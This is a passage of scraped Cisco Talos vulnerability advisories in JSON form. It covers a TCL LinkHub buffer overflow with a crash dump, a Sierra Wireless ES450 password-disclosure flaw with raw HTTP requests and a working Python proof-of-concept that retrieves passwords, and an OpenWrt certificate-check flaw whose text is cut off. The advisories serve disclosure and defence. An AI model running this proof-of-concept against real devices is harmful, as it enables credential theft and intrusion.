0\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \n\n#### CVE-2022-23919 - name stack buffer overflow\n\nAs seen above at [5] the `name` `memcpy` occurs into a stack-based buffer of size 0x40.\n \n \n 00413d34 2000c28f lw $v0, 0x20($fp) {var_1b8_1}\n 00413d38 1000508c lw $s0, 0x10($v0) {MfRule::name}\n 00413d3c 2000c28f lw $v0, 0x20($fp) {var_1b8_1}\n 00413d40 1000428c lw $v0, 0x10($v0) {MfRule::name}\n 00413d44 21204000 move $a0, $v0\n 00413d48 c08a828f lw $v0, -0x7540($gp) {strlen} [10]\n 00413d4c 21c84000 move $t9, $v0\n 00413d50 09f82003 jalr $t9\n 00413d54 00000000 nop \n 00413d58 1800dc8f lw $gp, 0x18($fp) {var_1c0}\n 00413d5c 4800c327 addiu $v1, $fp, 0x48 {nameBuffer}\n 00413d60 21206000 move $a0, $v1 {nameBuffer}\n 00413d64 21280002 move $a1, $s0\n 00413d68 21304000 move $a2, $v0\n 00413d6c b88b828f lw $v0, -0x7448($gp) {memcpy}\n 00413d70 21c84000 move $t9, $v0\n 00413d74 09f82003 jalr $t9\n 00413d78 00000000 nop \n \n\nAt [8] and [10] we can see that the length of the `memcpy` is not the static size of the buffer, but instead the `strlen` of the user data provided from the protobuf packet. This results in a simple stack buffer overflow.\n\n#### Crash Information\n \n \n Program received signal SIGSEGV, Segmentation fault.\n 0x41414141 in ?? ()\n [ Legend: Modified register | Code | Heap | Stack | String ]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x806f0000\n $v0 : 0x0\n $v1 : 0x2\n $a0 : 0x11\n $a1 : 0x2\n $a2 : 0x200\n $a3 : 0x0\n $t0 : 0x0\n $t1 : 0x41414141 (\"AAAA\"?)\n $t2 : 0x004bc828 \u2192 0x0045d3e0 \u2192 <add_results_timeout_check+0> lui gp, 0x5\n $t3 : 0x5\n $t4 : 0xfffffffc\n $t5 : 0xfffffffe\n $t6 : 0x770bd534 \u2192 0x00000000\n $t7 : 0x0\n $s0 : 0x41414141 (\"AAAA\"?)\n $s1 : 0x7f9a90b8 \u2192 0x82011507\n $s2 : 0x774a6a60 \u2192 \"uc_api_lib.c\"\n $s3 : 0x0\n $s4 : 0x774a7be4 \u2192 \"_session_read_and_dispatch\"\n $s5 : 0x7748d090 \u2192 0x3c1c0003\n $s6 : 0x1b3\n $s7 : 0x10\n $t8 : 0x264\n $t9 : 0x7709752c \u2192 0x3c1c0002\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x41414141 (\"AAAA\"?)\n $pc : 0x41414141 (\"AAAA\"?)\n $sp : 0x7f9a8e68 \u2192 0x004bb610 \u2192 0x77481c28 \u2192 0x28aaeef9\n $hi : 0x31a\n $lo : 0x1cbe9\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x004ae4b0 \u2192 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7f9a8e68\u2502+0x0000: 0x004bb610 \u2192 0x77481c28 \u2192 0x28aaeef9 \u2190 $sp\n 0x7f9a8e6c\u2502+0x0004: 0x000001ab\n 0x7f9a8e70\u2502+0x0008: 0x7f9a90dc \u2192 0xa6120108\n 0x7f9a8e74\u2502+0x000c: 0x00000000\n 0x7f9a8e78\u2502+0x0010: 0x004ae4b0 \u2192 0x00000000\n 0x7f9a8e7c\u2502+0x0014: 0x00000000\n 0x7f9a8e80\u2502+0x0018: 0x004bb610 \u2192 0x77481c28 \u2192 0x28aaeef9\n 0x7f9a8e84\u2502+0x001c: 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] Cannot access memory at address 0x41414140\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, stopped 0x41414141 in ?? (), reason: SIGSEGV\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \n\n##### TIMELINE\n\n2022-02-08 - Initial Vendor Contact \n2022-02-09 - Vendor Disclosure \n2022-08-01 - Public Release\n\n##### Credit\n\nDiscovered by Carl Hurd of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1456\n\nPrevious Report\n\nTALOS-2022-1454\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-01T00:00:00", "type": "talos", "title": "TCL LinkHub Mesh Wifi confsrv set_mf_rule stack-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23918", "CVE-2022-23919"], "modified": "2022-08-01T00:00:00", "id": "TALOS-2022-1455", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1455", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T16:54:28", "description": "### Summary\n\nAn exploitable Information Disclosure vulnerability exists in the ACEManager Embedded_Ace_Get_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information disclosure, resulting in the exposure of confidential information, including, but not limited to, plaintext passwords and SNMP community strings. An attacker can make an authenticated HTTP request, or run the binary, to trigger this vulnerability.\n\n### Tested Versions\n\nSierra Wireless AirLink ES450 FW 4.9.3\n\n### Product URLs\n\n<https://www.sierrawireless.com/products-and-solutions/routers-gateways/es450/>\n\n### CVSSv3 Score\n\n7.7 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n\n### CWE\n\nCWE-200: Information Exposure\n\n### Details\n\nSierra Wireless is a wireless communications equipement designer and manufacturer. They provide both embedded solutions as well as wireless hardware solutions, including both the ES450 and GX450 devices. The AirLink ES450 is a LTE gateway designed for distributed enterprise. The ES450 is typically seen connecting Point-of-sale devices, remote SCADA equipment, or other business critical equipment. The AirLink ES450 also provides a terminal server for remote out-of-band administration.\n\nACEManager is the web server included with the AirLink ES450. This web server is responsible for the majority of interactions in the device. Some specific capabilities of the web server are routing, device reconfiguration, user authentication and certificate management. The vendor has stated that the ACEManager web application is not accessible by default from the Cellular WAN.\n\nThese vulnerabilities were discovered and tested using the AirLink ES450. Most likely this vulnerabilities also affects the AirLink GX450 product as well.\n\n#### CVE-2018-4070\n\nThe Embedded_Ace_Get_Task.cgi executable is used to retrieve MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the `/cgi-bin/Embedded_Ace_Get_Task.cgi` endpoint. The following request shows the MSCIID for retrieving the `user` password for the device in plaintext.\n \n \n POST /cgi-bin/Embedded_Ace_Get_Task.cgi HTTP/1.1\n Host: 192.168.13.31:9191\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\n Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html\n Content-Type: text/xml\n Cache-Control: no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 4\n Cookie: token=fd57b4e137a8f9fe1a3c998fc25b0e1e\n Connection: close\n \n 5003\n \n\nThis binary has `-rwxr-xr-x` permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to retrieve the password of other users on the system, status of services, and retrieve any other configuration on the device.\n\n#### CVE-2018-4071\n\nThe Embedded_Ace_TLGet_Task.cgi executable is used to retrieve MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the `/cgi-bin/Embedded_Ace_TLGet_Task.cgi` endpoint. The following request shows the MSCIID for retrieving the `user` password for the device in plaintext.\n \n \n POST /cgi-bin/Embedded_Ace_TLGet_Task.cgi HTTP/1.1\n Host: 192.168.13.31:9191\n User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\n Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html\n Content-Type: text/xml\n Cache-Control: no-cache, must-revalidate\n Pragma: no-cache\n Content-Length: 18\n Cookie: token=fd57b4e137a8f9fe1a3c998fc25b0e1e\n Connection: close\n \n rows=1&colsid=5003\n \n\nThis binary has `-rwxr-xr-x` permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to retrieve the password of other users on the system, status of services, and retrieve any other configuration on the device.\n\n### Exploit Proof of Concept\n \n \n #!/usr/bin/env python\n #Author : Carl Hurd, Cisco Talos\n import sys\n import requests\n \n def auth(ip, port, password):\n data = \"\"\"<request xmlns=\"urn:acemanager\">\n <connect>\n <login>user</login>\n <password><![CDATA[{}]]></password>\n </connect>\n </request>\"\"\".format(password)\n \n response = requests.post(\"http://\"+ip+\":\"+port+\"/xml/Connect.xml\", data=data)\n \n try:\n cookies = dict(token=response.headers[\"Set-Cookie\"].split(\"; \")[0][len(\"token=\"):])\n return cookies\n except:\n print(\"Error while authenticating\")\n sys.exit(0)\n \n def main():\n if len(sys.argv) < 5 or len(sys.argv) > 5:\n print(\"Usage : {} [ip address] [port] [password of user] [msciid to get]\".format(sys.argv[0]))\n sys.exit(0)\n \n ip = sys.argv[1]\n port = sys.argv[2]\n password = sys.argv[3]\n msciid = sys.argv[4]\n \n print(\"MSCIID : {}\\n\".format(msciid))\n \n cookies = auth(ip, port, password)\n \n data = msciid\n response = requests.post(\"http://\"+ip+\":\"+port+\"/cgi-bin/Embedded_Ace_Get_Task.cgi\", cookies=cookies, data=data)\n \n print(response.text)\n \n if __name__ == \"__main__\":\n main()\n \n\n### Timeline\n\n2018-12-14 - Vendor disclosure \n2018-12-17 - Vendor acknowledged \n2019-01-08 - Discussion to review vendor\u2019s analysis of issues&lt;br 2019-02-26 - Vendor provided analysis of CVSS scoring \n2019-03-26 - Vendor established timelines for fix/public disclosure \n2019-04-20 - Talos provided revised CVSS score on TALOS-2018-0746, TALOS-2018-0751, TALOS-2018-0752, TALOS-2018-0755, and TALOS-2018-0756 \n2019-04-25 - Public Release\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-25T00:00:00", "type": "talos", "title": "Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4070", "CVE-2018-4071"], "modified": "2019-04-25T00:00:00", "id": "TALOS-2018-0755", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0755", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-12-02T16:53:59", "description": "# Talos Vulnerability Report\n\n### TALOS-2019-0893\n\n## OpenWrt ustream-ssl certificate verification information leak vulnerability\n\n##### November 15, 2019\n\n##### CVE Number\n\nCVE-2019-5101,CVE-2019-5102\n\n##### SUMMARY\n\nAn exploitable information leak vulnerability exists in the ustream-ssl library of OpenWrt, versions 18.06.4 and 15.05.1. When connecting to a remote server, the server\u2019s SSL certificate is checked but no action is taken when the certificate is invalid. An attacker could exploit this behavior by performing a man-in-the-middle attack, providing any certificate, leading to the theft of all the data sent by the client during the first request.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nOpenWRT OpenWrt 15.05.1, via wget (busybox) \nOpenWRT OpenWrt 18.06.4, via wget (uclient-fetch)\n\n##### PRODUCT URLS\n\nOpenWRT - <https://openwrt.org/>\n\n##### CVSSv3 SCORE\n\n4.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N\n\n##### CWE\n\nCWE-295 - Improper Certificate Validation\n\n##### DETAILS\n\nOpenWrt is a Linux-based OS, primarily used on embedded devices to route network traffic. OpenWrt is highly customizable, and ships with a set of tools and libraries that have been optimized to run on hardware with limited resources.\n\nAmong these tools, OpenWrt uses `wget` to allow scripts to download files from the web. In OpenWrt 18.06.4, `wget` is a symbolic link to `uclient-fetch`, while it\u2019s a symbolic link to `busybox` in OpenWrt 15.05.1. In both cases, the SSL support is provided by the `ustream-ssl` library, which is an SSL wrapper for `OpenSSL`, `mbed TLS`, and `wolfSSL`.\n\nWhen the underlying SSL library used is `OpenSSL` (package `libustream-openssl`) or `mbed TLS` (package `libustream-mbedtls`), `ustream-ssl` has an issue that could be exploited by an attacker to bypass the server\u2019s certificate check and reveal the whole contents of the client\u2019s request.\n\n#### CVE-2019-5101 - OpenSSL (libustream-openssl)\n\nAfter an SSL connection is initialized via `_ustream_ssl_init`, and after any data (e.g. the client\u2019s HTTP request) is written to the stream using `ustream_printf`, the code eventually enters the function `__ustream_ssl_poll`, which is used to dispatch the read/write events.\n \n \n static bool __ustream_ssl_poll(struct ustream *s)\n {\n struct ustream_ssl *us = container_of(s->next, struct ustream_ssl, stream);\n char *buf;\n int len, ret;\n bool more = false;\n \n ustream_ssl_check_conn(us); // [1]\n if (!us->connected || us->error)\n return false;\n ...\n \n\nThe first action taken is to check the SSL connection by calling `ustream_ssl_check_conn` at [1]:\n \n \n static void ustream_ssl_check_conn(struct ustream_ssl *us)\n {\n if (us->connected || us->error)\n return;\n \n if (__ustream_ssl_connect(us) == U_SSL_OK) { // [2]\n us->connected = true; // [3] connected\n if (us->notify_connected)\n us->notify_connected(us);\n ustream_write_pending(&us->stream); // [4] write to the stream\n }\n }\n \n\nThis function, in turn, calls `__ustream_ssl_connect` [2], and if the return is `U_SSL_OK`, then the connection is assumed to be established [3] and any pending write operations are executed [4].\n\nBecause of the write happening at [4], the function `__ustream_ssl_connect` should only return `U_SSL_OK` when the SSL connection has been checked and the server\u2019s certificate is verified:\n \n \n __hidden enum ssl_conn_status __ustream_ssl_connect(struct ustream_ssl *us)\n {\n void *ssl = us->ssl;\n int r;\n \n if (us->server)\n r = SSL_accept(ssl);\n else\n r = SSL_connect(ssl);\n \n if (r == 1) {\n #ifndef CYASSL_OPENSSL_H_\n ustream_ssl_verify_cert(us); // [5]\n #endif\n return U_SSL_OK; // [6]\n }\n \n r = SSL_get_error(ssl, r);\n if (r == SSL_ERROR_WANT_READ || r == SSL_ERROR_WANT_WRITE)\n return U_SSL_PENDING;\n \n ustream_ssl_error(us, r);\n return U_SSL_ERROR;\n }\n \n\nHowever, while the function will call `ustream_ssl_verify_cert` at [5], `U_SSL_OK` will be returned in any case [6]. \nIndeed, `ustream_ssl_verify_cert` checks the connection and returns early [7], without setting `us->valid_cert` (which will stay `false`).\n \n \n static void ustream_ssl_verify_cert(struct ustream_ssl *us)\n {\n void *ssl = us->ssl;\n X509 *cert;\n int res;\n \n res = SSL_get_verify_result(ssl);\n if (res != X509_V_OK) {\n if (us->notify_verify_error) // [7]\n us->notify_verify_error(us, res,\n X509_verify_cert_error_string(res));\n return;\n }\n \n cert = SSL_get_peer_certificate(ssl);\n if (!cert)\n return;\n \n us->valid_cert = true; // [8]\n us->valid_cn = ustream_ssl_verify_cn(us, cert);\n X509_free(cert);\n }\n \n\nAt this point, the SSL connection is established [3] (from the point of view of `ustream-ssl`), and the pending writes are 